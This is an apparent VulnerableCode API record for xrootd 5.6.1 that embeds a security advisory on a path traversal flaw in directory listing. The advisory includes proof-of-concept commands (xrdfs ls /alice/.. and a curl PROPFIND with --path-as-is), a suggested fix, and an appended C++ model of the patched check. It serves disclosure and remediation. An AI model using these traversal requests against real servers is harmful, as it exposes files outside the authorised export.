{"url":"http://public2.vulnerablecode.io/api/packages/1003126?format=json","purl":"pkg:pypi/xrootd@5.6.1","type":"pypi","namespace":"","name":"xrootd","version":"5.6.1","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"5.9.2","latest_non_vulnerable_version":"5.9.2","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359960?format=json","vulnerability_id":"VCID-daeh-s7gc-4fc9","summary":"xrootd has path traversal in directory listing that allows access to the parent directory via trailing \"..\" pattern\n## Summary\n\nA path traversal vulnerability in XRootD allows users to escape the exported directory scope and enumerate the contents of the parent directory by appending `/..` (specifically without trailing slash) to an exported path in `xrdfs ls` or `HTTP PROPFIND` requests.\n\nThis bypass ignores the `all.export` restriction.\n\n## Affected component\n\n`src/XrdXrootd/XrdXrootdXeq.cc`, and more precisely the functions `rpCheck()` and `Squash()` used in `do_Dirlist()` ([link](https://github.com/xrootd/xrootd/blob/19aa6dee76906fb4d56ded55e49bbe4171ade915/src/XrdXrootd/XrdXrootdXeq.cc#L696)), as they do not check if the path ends with \"..\" (without trailing slash).\nThen the path is passed directly to the filesystem layer.\n\n## PoC\n\n### Configuration\n\n- **Configuration file:** \n```conf\nxrd.port 1094\n\n# Exposing only /alice/\noss.localroot /srv/xrootd/data/\nall.export /alice/\n\n# HTTP\nxrd.protocol http:1094 libXrdHttp.so\n\n# Logs / monitoring\nall.adminpath /var/spool/xrootd\nall.pidpath /var/run/xrootd\n```\n\n- **Filesystem layout on the server:**\n```\n/srv/xrootd/data/\n├── alice/       ← only exported directory\n├── bob/         ← not exported\n└── secret.txt   ← not exported\n```\n\n- **Starting the server:**  `xrootd -c /etc/xrootd/xrootd.cfg` \n\n### Steps to reproduce\n\n**Normal behavior (access outside export is denied):**\n```bash\n$ xrdfs root://<xrootd-server> ls 
/\n[ERROR] Server responded with an error: [3010] Stating path '/' is disallowed.\n```\n\n**Bypass via trailing `..`:**\n```bash\n$ xrdfs root://<xrootd-server> ls /alice/..\n/alice/../alice\n/alice/../bob\n/alice/../secret.txt\n```\n\n**Also exploitable via HTTP PROPFIND:**\n\n```bash\ncurl -X PROPFIND 'http://<xrootd-server>:1094/alice/..' \\\n  --path-as-is \\\n  -H \"Depth: 1\"\n```\nReturns HTTP 200 with a full listing of the parent directory, including unexported entries (`bob/`, `secret.txt`).\n\n**However, file download via this path traversal is blocked:**\n```bash\n$ xrdcp root://<xrootd-server>/alice/../secret.txt .\n[0B/0B][100%][==================================================][0B/s]  \nRun: [ERROR] Server responded with an error: [3010] Opening relative path 'alice/../secret.txt' is disallowed. (source)\n```\n\n## Impact\nAn attacker can enumerate directories and filenames outside the authorized export scope defined by `all.export`. In the example above, a server exporting only `/alice/` leaks the existence of `/bob/` and `secret.txt` located in the parent directory (`oss.localroot`).\n\nFile download is not possible through this vector, as `xrdcp` correctly rejects the path with error 3010. The impact is therefore limited to **information disclosure** (directory and filename enumeration).\n\nThis vulnerability could affect all XRootD deployments regardless of authentication configuration, as it bypasses the export path restriction itself.\n\n## Suggested fix\n\nIn `rpCheck()` (`src/XrdXrootd/XrdXrootdXeq.cc`), change:\n```cpp\n// Before\nif (fn[0] == '.' && fn[1] == '.' && fn[2] == '/') return 1;\n\n// After\nif (fn[0] == '.' && fn[1] == '.' 
&& (fn[2] == '/' || fn[2] == '\\0')) return 1;\n```","references":[{"reference_url":"http://github.com/xrootd/xrootd/releases/tag/v5.9.2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://github.com/xrootd/xrootd/releases/tag/v5.9.2"},{"reference_url":"https://github.com/xrootd/xrootd","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/xrootd/xrootd"},{"reference_url":"https://github.com/xrootd/xrootd/commit/45efac7267a115ca4f2102214498e8cb011eb69b","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/xrootd/xrootd/commit/45efac7267a115ca4f2102214498e8cb011eb69b"},{"reference_url":"https://github.com/xrootd/xrootd/security/advisories/GHSA-vj8v-p5vw-m6v5","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/xrootd/xrootd/security/advisories/GHSA-vj8v-p5vw-m6v5"},{"reference_url":"https://github.com/advisories/GHSA-vj8v-p5vw-m6v5","reference_id":"GHSA-vj8v-p5vw-m6v5","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-vj8v-p5vw-m6v5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/374234?format=json","purl":"pkg:pypi/xrootd@5.9.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"htt
p://public2.vulnerablecode.io/packages/pkg:pypi/xrootd@5.9.2"}],"aliases":["GHSA-vj8v-p5vw-m6v5"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-daeh-s7gc-4fc9"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/xrootd@5.6.1"}
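The trailing-`..` bypass described in the advisory's "Affected component" and "Suggested fix" sections, modelled as an added example. This is not XRootD's code: only the one-line `fn[0] == '.' && fn[1] == '.' && fn[2] == '/'` predicate is taken from the advisory. Applying that predicate at the start of every path component, the textual prefix test standing in for `all.export /alice/`, and the function names `dirlist_allowed_before` / `dirlist_allowed_after` are assumptions made for illustration.

```cpp
// Added example, not XRootD code: a model of the dot-dot check from the
// advisory. Only the one-line predicate comes from the page; applying it
// per path component and the textual export-prefix test are assumptions.
#include <cstring>
#include <iostream>
#include <string>

// Predicate as quoted for the unpatched rpCheck(): only "../" is caught.
static bool dotdot_before(const char *fn) {
    return fn[0] == '.' && fn[1] == '.' && fn[2] == '/';
}

// Predicate from the suggested fix: "../" or a ".." that ends the path.
static bool dotdot_after(const char *fn) {
    return fn[0] == '.' && fn[1] == '.' && (fn[2] == '/' || fn[2] == '\0');
}

// Apply the predicate at the start of every path component. Returns true
// when the path is rejected. (Assumption: the real rpCheck() walks the
// path component by component; the advisory does not show that loop.)
static bool rejected_by(const std::string &path, bool (*pred)(const char *)) {
    const char *p = path.c_str();
    if (pred(p)) return true;
    for (const char *s = std::strchr(p, '/'); s != nullptr; s = std::strchr(s + 1, '/'))
        if (pred(s + 1)) return true;
    return false;
}

// Export-scope test modelled on `all.export /alice/`: a textual prefix
// comparison, which is exactly why "/alice/.." gets through it.
static bool in_export(const std::string &path, const std::string &exp) {
    return path.compare(0, exp.size(), exp) == 0 || path + "/" == exp;
}

// Directory-listing decision with the unpatched predicate (true = allowed).
bool dirlist_allowed_before(const std::string &path) {
    return in_export(path, "/alice/") && !rejected_by(path, dotdot_before);
}

// Same decision with the fixed predicate.
bool dirlist_allowed_after(const std::string &path) {
    return in_export(path, "/alice/") && !rejected_by(path, dotdot_after);
}

int main() {
    // Constructed request paths mirroring the advisory's PoC.
    const char *paths[] = {"/", "/alice/", "/alice/..", "/alice/../bob", "/alice/..hidden"};
    for (const char *p : paths)
        std::cout << p << "\tbefore: " << (dirlist_allowed_before(p) ? "allowed" : "denied")
                  << "\tafter: " << (dirlist_allowed_after(p) ? "allowed" : "denied") << '\n';
    return 0;
}
```

`/alice/../bob` is denied by both variants because the `..` is followed by `/`, which matches the advisory's observation that `xrdcp` of `/alice/../secret.txt` fails with error 3010. `/alice/..` passes the prefix test and the unpatched predicate, since `fn[2]` is the terminating NUL rather than `/`, and is only denied once the fix adds the `'\0'` case. A name such as `/alice/..hidden` stays allowed under both, showing the fix is limited to the trailing-`..` case rather than rejecting every name that starts with two dots.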